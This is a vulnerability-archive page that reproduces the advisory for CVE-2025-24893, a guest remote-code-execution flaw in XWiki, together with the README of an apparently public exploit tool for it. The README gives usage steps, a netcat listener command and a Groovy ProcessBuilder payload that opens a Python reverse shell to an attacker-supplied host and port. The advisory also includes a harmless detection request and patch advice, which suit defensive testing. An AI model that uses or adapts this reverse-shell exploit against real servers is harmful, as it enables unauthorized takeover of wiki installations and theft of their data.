Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/hackersonsteroids/cve-2025-24893
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
Modified exploit for CVE-2025-24893
Readme
# CVE-2025-24893 XWiki RCE Exploit

![Exploit Banner](https://img.shields.io/badge/CVE-2025--24893-critical)

A simple Python3 script to exploit **CVE-2025-24893**, a remote code execution vulnerability in XWiki Platform, using a Groovy-based async macro and a configurable reverse shell payload.

> **⚠️ WARNING:** This tool is provided **for educational and authorized testing purposes only**. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

---

## Table of Contents

- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Detection & Protocol Fallback](#detection--protocol-fallback)
- [Reverse Shell Payload](#reverse-shell-payload)
- [License](#license)
- [Disclaimer](#disclaimer)

---

## Features

- ✅ Automatically detects whether the target supports HTTPS or HTTP  
- ✅ Constructs a Groovy `ProcessBuilder` snippet to avoid `Runtime.exec` quirks  
- ✅ URL-encodes the XWiki async+groovy macro payload  
- ✅ Configurable reverse shell (host + port)  
- ✅ Prints HTTP response code to help verify delivery  

---

## Requirements

- Python 3.6 or higher  
- [`requests`](https://pypi.org/project/requests/) library  

```bash
pip install requests
````

---

## Installation

Clone this repository:

```bash
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
```
---

## Usage

```bash
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
```

* `<TARGET_DOMAIN>`
  The XWiki host (e.g. `wiki.example.local`).

* `<LHOST>`
  Your attacker machine’s IP (where your listener is running).

* `<LPORT>`
  Your listener port (integer).

---

### Example

1. Start a listener on your machine:

```bash
nc -lvnp 4444
```

2. Run the exploit:

```bash
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
```

3. On success, check your `netcat` listener for a shell.

---

## Detection & Protocol Fallback

Before sending the payload, the script:

1. Tries `https://<TARGET_DOMAIN>`
2. Falls back to `http://<TARGET_DOMAIN>` if HTTPS fails
3. Exits if neither is reachable

This helps ensure compatibility with mixed‐protocol deployments.

---

## Reverse Shell Payload

By default, the script uses a Python3 one-liner:

```groovy
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
```

* You can modify the `build_payload()` function if you need a different shell (e.g. Bash, Perl, PHP, etc.).

---

## License

This project is licensed under the **MIT License**. See the [LICENSE](LICENSE) file for details.

---

## Disclaimer

This tool is designed for **authorized security assessment** and **educational purposes** only. The authors hold no responsibility for misuse. Always obtain explicit permission before testing any target systems.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →